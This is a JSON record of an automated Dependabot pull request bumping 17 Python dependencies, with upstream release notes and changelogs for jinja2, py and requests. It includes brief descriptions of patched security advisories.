href=\"https://redirect.github.com/pallets/jinja/issues/1661\"\u003e#1661\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ePackageLoader\u003c/code\u003e shows a clearer error message when the package does not contain the templates directory. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1705\"\u003e#1705\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eImprove annotations for methods returning copies. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1880\"\u003e#1880\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eurlize\u003c/code\u003e does not add \u003ccode\u003emailto:\u003c/code\u003e to values like \u003ccode\u003e@a@b\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1870\"\u003e#1870\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eTests decorated with \u003ccode\u003e@pass_context\u003c/code\u003e can be used with the \u003ccode\u003e|select\u003c/code\u003e filter. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1624\"\u003e#1624\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUsing \u003ccode\u003eset\u003c/code\u003e for multiple assignment (\u003ccode\u003ea, b = 1, 2\u003c/code\u003e) does not fail when the target is a namespace attribute. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1413\"\u003e#1413\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUsing \u003ccode\u003eset\u003c/code\u003e in all branches of \u003ccode\u003e{% if %}{% elif %}{% else %}\u003c/code\u003e blocks does not cause the variable to be considered initially undefined. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1253\"\u003e#1253\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.4\u003c/h2\u003e\n\u003cp\u003eThis is the Jinja 3.1.4 security release, which fixes security issues and bugs but does not otherwise change behavior and should not result in breaking changes.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Jinja2/3.1.4/\"\u003ehttps://pypi.org/project/Jinja2/3.1.4/\u003c/a\u003e\nChanges: \u003ca href=\"https://jinja.palletsprojects.com/en/3.1.x/changes/#version-3-1-4\"\u003ehttps://jinja.palletsprojects.com/en/3.1.x/changes/#version-3-1-4\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003exmlattr\u003c/code\u003e filter does not allow keys with \u003ccode\u003e/\u003c/code\u003e solidus, \u003ccode\u003e\u0026gt;\u003c/code\u003e greater-than sign, or \u003ccode\u003e=\u003c/code\u003e equals sign, in addition to disallowing spaces. Regardless of any validation done by Jinja, user input should never be used as keys to this filter, or must be separately validated first. GHSA-h75v-3vvj-5mfj\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.3\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the 3.1.x feature branch.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-h5c8-rqwp-cp95\"\u003eGHSA-h5c8-rqwp-cp95\u003c/a\u003e. You are affected if you are using \u003ccode\u003exmlattr\u003c/code\u003e and passing user input as attribute keys.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/jinja/blob/main/CHANGES.rst\"\u003ejinja2's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 3.1.6\u003c/h2\u003e\n\u003cp\u003eReleased 2025-03-05\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003e|attr\u003c/code\u003e filter does not bypass the environment's attribute lookup,\nallowing the sandbox to apply its checks. :ghsa:\u003ccode\u003ecpwx-vrp4-4pq7\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 3.1.5\u003c/h2\u003e\n\u003cp\u003eReleased 2024-12-21\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe sandboxed environment handles indirect calls to \u003ccode\u003estr.format\u003c/code\u003e, such as\nby passing a stored reference to a filter that calls its argument.\n:ghsa:\u003ccode\u003eq2x7-8rv6-6q7h\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eEscape template name before formatting it into error messages, to avoid\nissues with names that contain f-string syntax.\n:issue:\u003ccode\u003e1792\u003c/code\u003e, :ghsa:\u003ccode\u003egmj6-6f8f-6699\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eSandbox does not allow \u003ccode\u003eclear\u003c/code\u003e and \u003ccode\u003epop\u003c/code\u003e on known mutable sequence\ntypes. :issue:\u003ccode\u003e2032\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eCalling sync \u003ccode\u003erender\u003c/code\u003e for an async template uses \u003ccode\u003easyncio.run\u003c/code\u003e.\n:pr:\u003ccode\u003e1952\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAvoid unclosed \u003ccode\u003eauto_aiter\u003c/code\u003e warnings. :pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eReturn an \u003ccode\u003eaclose\u003c/code\u003e-able \u003ccode\u003eAsyncGenerator\u003c/code\u003e from\n\u003ccode\u003eTemplate.generate_async\u003c/code\u003e. :pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving \u003ccode\u003eroot_render_func()\u003c/code\u003e unclosed in\n\u003ccode\u003eTemplate.generate_async\u003c/code\u003e. :pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving async generators unclosed in blocks, includes and extends.\n:pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eThe runtime uses the correct \u003ccode\u003econcat\u003c/code\u003e function for the current environment\nwhen calling block references. :issue:\u003ccode\u003e1701\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eMake \u003ccode\u003e|unique\u003c/code\u003e async-aware, allowing it to be used after another\nasync-aware filter. :issue:\u003ccode\u003e1781\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e|int\u003c/code\u003e filter handles \u003ccode\u003eOverflowError\u003c/code\u003e from scientific notation.\n:issue:\u003ccode\u003e1921\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eMake compiling deterministic for tuple unpacking in a \u003ccode\u003e{% set ... %}\u003c/code\u003e\ncall. :issue:\u003ccode\u003e2021\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix dunder protocol (\u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e/etc) interaction with \u003ccode\u003eUndefined\u003c/code\u003e\nobjects. :issue:\u003ccode\u003e2025\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e support for the internal \u003ccode\u003emissing\u003c/code\u003e object.\n:issue:\u003ccode\u003e2027\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eEnvironment.overlay(enable_async)\u003c/code\u003e is applied correctly. :pr:\u003ccode\u003e2061\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eThe error message from \u003ccode\u003eFileSystemLoader\u003c/code\u003e includes the paths that were\nsearched. :issue:\u003ccode\u003e1661\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ePackageLoader\u003c/code\u003e shows a clearer error message when the package does not\ncontain the templates directory. :issue:\u003ccode\u003e1705\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eImprove annotations for methods returning copies. :pr:\u003ccode\u003e1880\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eurlize\u003c/code\u003e does not add \u003ccode\u003emailto:\u003c/code\u003e to values like \u003ccode\u003e@a@b\u003c/code\u003e. :pr:\u003ccode\u003e1870\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/15206881c006c79667fe5154fe80c01c65410679\"\u003e\u003ccode\u003e1520688\u003c/code\u003e\u003c/a\u003e release version 3.1.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/90457bbf33b8662926ae65cdde4c4c32e756e403\"\u003e\u003ccode\u003e90457bb\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/065334d1ee5b7210e1a0a93c37238c86858f2af7\"\u003e\u003ccode\u003e065334d\u003c/code\u003e\u003c/a\u003e attr filter uses env.getattr\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/033c20015c7ca899ab52eb921bb0f08e6d3dd145\"\u003e\u003ccode\u003e033c200\u003c/code\u003e\u003c/a\u003e start version 3.1.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/bc68d4efa99c5f77334f0e519628558059ae8c35\"\u003e\u003ccode\u003ebc68d4e\u003c/code\u003e\u003c/a\u003e use global contributing guide (\u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2070\"\u003e#2070\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/247de5e0c5062a792eb378e50e13e692885ee486\"\u003e\u003ccode\u003e247de5e\u003c/code\u003e\u003c/a\u003e use global contributing guide\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/ab8218c7a1b66b62e0ad6b941bd514e3a64a358f\"\u003e\u003ccode\u003eab8218c\u003c/code\u003e\u003c/a\u003e use project advisory link instead of global\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/b4ffc8ff299dfd360064bea4cd2f862364601ad2\"\u003e\u003ccode\u003eb4ffc8f\u003c/code\u003e\u003c/a\u003e release version 3.1.5 (\u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2066\"\u003e#2066\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/877f6e51be8e1765b06d911cfaa9033775f051d1\"\u003e\u003ccode\u003e877f6e5\u003c/code\u003e\u003c/a\u003e release version 3.1.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/8d588592653b052f957b720e1fc93196e06f207f\"\u003e\u003ccode\u003e8d58859\u003c/code\u003e\u003c/a\u003e remove test pypi\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pallets/jinja/compare/2.10...3.1.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `py` from 1.5.3 to 1.11.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pytest-dev/py/blob/master/CHANGELOG.rst\"\u003epy's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e1.11.0 (2021-11-04)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eSupport Python 3.11\u003c/li\u003e\n\u003cli\u003eSupport \u003ccode\u003eNO_COLOR\u003c/code\u003e environment variable\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.5 =\u0026gt; 2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.10.0 (2020-12-12)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFix a regular expression DoS vulnerability in the py.path.svnwc SVN blame functionality (CVE-2020-29651)\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.4 =\u0026gt; 1.5\u003c/li\u003e\n\u003cli\u003eUpdate vendored iniconfig: 1.0.0 =\u0026gt; 1.1.1\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.9.0 (2020-06-24)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eAdd type annotation stubs for the following modules:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003epy.error\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.iniconfig\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.path\u003c/code\u003e (not including SVN paths)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.io\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.xml\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThere are no plans to type other modules at this time.\u003c/p\u003e\n\u003cp\u003eThe type annotations are provided in external .pyi files, not inline in the\ncode, and may therefore contain small errors or omissions. If you use \u003ccode\u003epy\u003c/code\u003e\nin conjunction with a type checker, and encounter any type errors you believe\nshould be accepted, please report it in an issue.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.8.2 (2020-06-15)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eOn Windows, \u003ccode\u003epy.path.local\u003c/code\u003es which differ only in case now have the same\nPython hash value. Previously, such paths were considered equal but had\ndifferent hashes, which is not allowed and breaks the assumptions made by\ndicts, sets and other users of hashes.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.8.1 (2019-12-27)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eHandle \u003ccode\u003eFileNotFoundError\u003c/code\u003e when trying to import pathlib in \u003ccode\u003epath.common\u003c/code\u003e\non Python 3.4 (\u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/207\"\u003e#207\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ccode\u003epy.path.local.samefile\u003c/code\u003e now works correctly in Python 3 on Windows when dealing with symlinks.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.8.0 (2019-02-21)\u003c/h1\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/447bac514febbb5433963582103d48bb27b3db17\"\u003e\u003ccode\u003e447bac5\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/6d003d9fee08542b9a5ca663568cb30c75d6c27c\"\u003e\u003ccode\u003e6d003d9\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/9cf613f3c21ca31f4a1ee9a70e6bd31dc3fe42d9\"\u003e\u003ccode\u003e9cf613f\u003c/code\u003e\u003c/a\u003e Declare support for Python 3.8-3.10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/d831150a3502363c9ca7242122d8e6cbd229169e\"\u003e\u003ccode\u003ed831150\u003c/code\u003e\u003c/a\u003e Update python_requires: Python 3.4 was already dropped\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e68532e9d67b089b17f1c96a708ff5f8ccf8bc8b\"\u003e\u003ccode\u003ee68532e\u003c/code\u003e\u003c/a\u003e Update CHANGELOG for 1.11.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/2f03e5a7fd9eb95db110cfd1bf40b987757f9d48\"\u003e\u003ccode\u003e2f03e5a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/258\"\u003e#258\u003c/a\u003e from blueyed/NO_COLOR\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e116b2bb8e1da9e8aef33c3606bd3d357ae28570\"\u003e\u003ccode\u003ee116b2b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/275\"\u003e#275\u003c/a\u003e from pytest-dev/upgrade-vendor-libs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f3a1a59d7d701a76680c2d0b0bd582311b00ded0\"\u003e\u003ccode\u003ef3a1a59\u003c/code\u003e\u003c/a\u003e remove build pin again\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f6cbf2814a2cc355d0a795233a32dc1285eec93b\"\u003e\u003ccode\u003ef6cbf28\u003c/code\u003e\u003c/a\u003e try to use pipx tox\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/3fe9ad76257860bfcdb25a23539972759ce348ed\"\u003e\u003ccode\u003e3fe9ad7\u003c/code\u003e\u003c/a\u003e try to use preinstalled tox\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pytest-dev/py/compare/1.5.3...1.11.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `requests` from 2.18.4 to 2.32.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/releases\"\u003erequests's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.32.5\u003c/h2\u003e\n\u003ch2\u003e2.32.5 (2025-08-18)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe SSLContext caching feature originally introduced in 2.32.0 has created\na new class of issues in Requests that have had negative impact across a number\nof use cases. The Requests team has decided to revert this feature as long term\nmaintenance of it is proving to be unsustainable in its current iteration.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for Python 3.14.\u003c/li\u003e\n\u003cli\u003eDropped support for Python 3.8 following its end of support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.4\u003c/h2\u003e\n\u003ch2\u003e2.32.4 (2025-06-10)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-47081 Fixed an issue where a maliciously crafted URL and trusted\nenvironment will retrieve credentials for the wrong hostname/machine from a\nnetrc file. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6965\"\u003e#6965\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNumerous documentation improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for pypy 3.11 for Linux and macOS. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6926\"\u003e#6926\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDropped support for pypy 3.9 following its end of support. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6926\"\u003e#6926\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.3\u003c/h2\u003e\n\u003ch2\u003e2.32.3 (2024-05-29)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed bug breaking the ability to specify custom SSLContexts in sub-classes of\nHTTPAdapter. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6716\"\u003e#6716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed issue where Requests started failing to run on Python versions compiled\nwithout the \u003ccode\u003essl\u003c/code\u003e module. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6724\"\u003e#6724\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.2\u003c/h2\u003e\n\u003ch2\u003e2.32.2 (2024-05-21)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eTo provide a more stable migration for custom HTTPAdapters impacted\nby the CVE changes in 2.32.0, we've renamed \u003ccode\u003e_get_connection\u003c/code\u003e to\na new public API, \u003ccode\u003eget_connection_with_tls_context\u003c/code\u003e. Existing custom\nHTTPAdapters will need to migrate their code to use this new API.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/blob/main/HISTORY.md\"\u003erequests's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.32.5 (2025-08-18)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe SSLContext caching feature originally introduced in 2.32.0 has created\na new class of issues in Requests that have had negative impact across a number\nof use cases. The Requests team has decided to revert this feature as long term\nmaintenance of it is proving to be unsustainable in its current iteration.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for Python 3.14.\u003c/li\u003e\n\u003cli\u003eDropped support for Python 3.8 following its end of support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.4 (2025-06-10)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-47081 Fixed an issue where a maliciously crafted URL and trusted\nenvironment will retrieve credentials for the wrong hostname/machine from a\nnetrc file.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNumerous documentation improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for pypy 3.11 for Linux and macOS.\u003c/li\u003e\n\u003cli\u003eDropped support for pypy 3.9 following its end of support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.3 (2024-05-29)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed bug breaking the ability to specify custom SSLContexts in sub-classes of\nHTTPAdapter. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6716\"\u003e#6716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed issue where Requests started failing to run on Python versions compiled\nwithout the \u003ccode\u003essl\u003c/code\u003e module. (\u003ca href=\"https://redirect...\n\n_Description has been truncated_","html_url":"https://github.com/perplext/requests/pull/2","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/perplext%2Frequests/issues/2","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/2/packages"}},{"old_version":"1.5.3","new_version":"1.11.0","update_type":"minor","path":null,"pr_created_at":"2025-08-20T03:45:09.000Z","version_change":"1.5.3 → 1.11.0","issue":{"uuid":"2758323675","node_id":"PR_kwDOAOlDSM6kaK3b","number":2,"state":"open","title":"Bump the pip group across 1 directory with 17 updates","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":0,"pull_request":true,"closed_at":null,"author_association":"NONE","state_reason":null,"created_at":"2025-08-20T03:45:09.000Z","updated_at":"2025-08-20T03:45:09.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"pip","update_count":17,"packages":[{"name":"autobahn","old_version":"18.6.1","new_version":"24.4.2","repository_url":"https://github.com/crossbario/autobahn-python"},{"name":"babel","old_version":"2.6.0","new_version":"2.9.1","repository_url":"https://github.com/python-babel/babel"},{"name":"certifi","old_version":"2018.4.16","new_version":"2024.7.4","repository_url":"https://github.com/certifi/python-certifi"},{"name":"configobj","old_version":"5.0.6","new_version":"5.0.9","repository_url":"https://github.com/DiffSK/configobj"},{"name":"cryptography","old_version":"2.2.2","new_version":"44.0.1","repository_url":"https://github.com/pyca/cryptography"},{"name":"flask","old_version":"0.12.4","new_version":"2.2.5","repository_url":"https://github.com/pallets/flask"},{"name":"idna","old_version":"2.6","new_version":"3.7","repository_url":"https://github.com/kjd/idna"},{"name":"jinja2","old_version":"2.10","new_version":"3.1.6","repository_url":"https://github.com/pallets/jinja"},{"name":"mako","old_version":"1.0.7","new_version":"1.2.2","repository_url":"https://github.com/sqlalchemy/mako"},{"name":"pillow","old_version":"5.1.0","new_version":"10.3.0","repository_url":"https://github.com/python-pillow/Pillow"},{"name":"py","old_version":"1.5.3","new_version":"1.11.0","repository_url":"https://github.com/pytest-dev/py"},{"name":"requests","old_version":"2.18.4","new_version":"2.32.4","repository_url":"https://github.com/psf/requests"},{"name":"sqlparse","old_version":"0.2.4","new_version":"0.5.0","repository_url":"https://github.com/andialbrecht/sqlparse"},{"name":"tqdm","old_version":"4.23.4","new_version":"4.66.3","repository_url":"https://github.com/tqdm/tqdm"},{"name":"twisted","old_version":"18.4.0","new_version":"24.7.0rc1","repository_url":"https://github.com/twisted/twisted"},{"name":"urllib3","old_version":"1.22","new_version":"2.5.0","repository_url":"https://github.com/urllib3/urllib3"},{"name":"werkzeug","old_version":"0.14.1","new_version":"3.0.6","repository_url":"https://github.com/pallets/werkzeug"}],"path":null,"ecosystem":"pip"},"body":"Bumps the pip group with 17 updates in the /nix/server directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [autobahn](https://github.com/crossbario/autobahn-python) | `18.6.1` | `24.4.2` |\n| [babel](https://github.com/python-babel/babel) | `2.6.0` | `2.9.1` |\n| [certifi](https://github.com/certifi/python-certifi) | `2018.4.16` | `2024.7.4` |\n| [configobj](https://github.com/DiffSK/configobj) | `5.0.6` | `5.0.9` |\n| [cryptography](https://github.com/pyca/cryptography) | `2.2.2` | `44.0.1` |\n| [flask](https://github.com/pallets/flask) | `0.12.4` | `2.2.5` |\n| [idna](https://github.com/kjd/idna) | `2.6` | `3.7` |\n| [jinja2](https://github.com/pallets/jinja) | `2.10` | `3.1.6` |\n| [mako](https://github.com/sqlalchemy/mako) | `1.0.7` | `1.2.2` |\n| [pillow](https://github.com/python-pillow/Pillow) | `5.1.0` | `10.3.0` |\n| [py](https://github.com/pytest-dev/py) | `1.5.3` | `1.11.0` |\n| [requests](https://github.com/psf/requests) | `2.18.4` | `2.32.4` |\n| [sqlparse](https://github.com/andialbrecht/sqlparse) | `0.2.4` | `0.5.0` |\n| [tqdm](https://github.com/tqdm/tqdm) | `4.23.4` | `4.66.3` |\n| [twisted](https://github.com/twisted/twisted) | `18.4.0` | `24.7.0rc1` |\n| [urllib3](https://github.com/urllib3/urllib3) | `1.22` | `2.5.0` |\n| [werkzeug](https://github.com/pallets/werkzeug) | `0.14.1` | `3.0.6` |\n\n\nUpdates `autobahn` from 18.6.1 to 24.4.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/crossbario/autobahn-python/blob/master/docs/changelog.rst\"\u003eautobahn's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e24.4.2\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: Ensure ID generator in range [1, 2 ** 53] (\u003ca href=\"https://redirect.github.com/crossbario/autobahn-python/issues/1637\"\u003e#1637\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e24.4.1\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003enew: bump minimum required Twisted version to 24.3.0 (\u003ccode\u003esee also 